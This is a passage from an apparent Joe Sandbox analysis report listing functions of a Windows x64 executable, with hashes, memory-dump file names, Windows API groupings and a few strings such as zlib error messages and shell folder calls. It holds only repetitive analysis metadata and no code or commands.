                                                                                                            • Instruction ID: 87c4626dc5aae324383e141a43b2e00566bb5f4a4c096efdb9aa1e36bd959186
                                                                                                            • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                                                                                            • Instruction Fuzzy Hash: CB41843721064087FBAA9B1AA010BEE7790E79A7C5F949115DB829FAE0CA7BD5058B00
                                                                                                            Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                                                                            • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                            • API String ID: 217932011-4219398408
                                                                                                            • Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                                                                            • Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
                                                                                                            • Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                                                                            • Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700
                                                                                                            Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                                                                            • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                                                            • API String ID: 1740785346-287042676
                                                                                                            • Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                                                                            • Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
                                                                                                            • Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                                                                            • Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610
                                                                                                            Function 0000000140016CC4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 298514914-0
                                                                                                            • Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                                                                            • Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
                                                                                                            • Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                                                                            • Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740
                                                                                                            Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsdupfreewcsncpy$Value
                                                                                                            • String ID:
                                                                                                            • API String ID: 1554701960-0
                                                                                                            • Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                                                                            • Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
                                                                                                            • Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                                                                            • Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                                                                            Function 0000000140011AB8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53librarysleeploaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProcSleep
                                                                                                            • String ID: 0V$InitOnceExecuteOnce$Kernel32.dll
                                                                                                            • API String ID: 938261879-2442906014
                                                                                                            • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                                                                            • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                                                                            • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                                                                            • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                                                                            Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClassDestroyEnableProcUnregister
                                                                                                            • String ID:
                                                                                                            • API String ID: 1570244450-0
                                                                                                            • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                                                                            • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                                                                            • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                                                                            • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                                                                            Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3383493704-0
                                                                                                            • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                                                                            • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                                                                            • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                                                                            • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                                                                            Function 00000001400117FC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                                                                            • String ID: 0V
                                                                                                            • API String ID: 2544007295-2748129481
                                                                                                            • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                                                                            • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                                                                            • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                                                                            • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                                                                            Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CurrentThread$EnableEnumWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2527101397-0
                                                                                                            • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                                                                            • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                                                                            • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                                                                            • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                                                                            Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocValue$Heap
                                                                                                            • String ID:
                                                                                                            • API String ID: 2472784365-0
                                                                                                            • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                                                                            • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                                                                            • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                                                                            • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                                                                            Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 458812214-0
                                                                                                            • Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                                                                            • Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
                                                                                                            • Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                                                                            • Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
                                                                                                            Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 3171405041-0
                                                                                                            • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                                                                            • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                                                                            • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                                                                            • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                                                                            Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3527438329-0
                                                                                                            • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                                                                            • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                                                                            • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                                                                            • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                                                                            Function 00000001400130CB Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $ $header crc mismatch
                                                                                                            • API String ID: 0-4092041874
                                                                                                            • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                                                                            • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                                                                            • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                                                                            • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                                                                            Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heapwcsncpy$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 1479455602-0
                                                                                                            • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                                                                            • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                                                                            • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                                                                            • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                                                                            Function 00000001400136B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memmove
                                                                                                            • String ID: $ $invalid stored block lengths
                                                                                                            • API String ID: 2162964266-1718185709
                                                                                                            • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                                                                            • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                                                                            • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                                                                            • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                                                                            Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EntryFunctionLookup$UnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3286588846-0
                                                                                                            • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                                                                            • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                                                                            • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                                                                            • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                                                                            Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharLower
                                                                                                            • String ID:
                                                                                                            • API String ID: 1615517891-0
                                                                                                            • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                                                                            • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                                                                            • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                                                                            • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                                                                            Function 00000001400171F0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
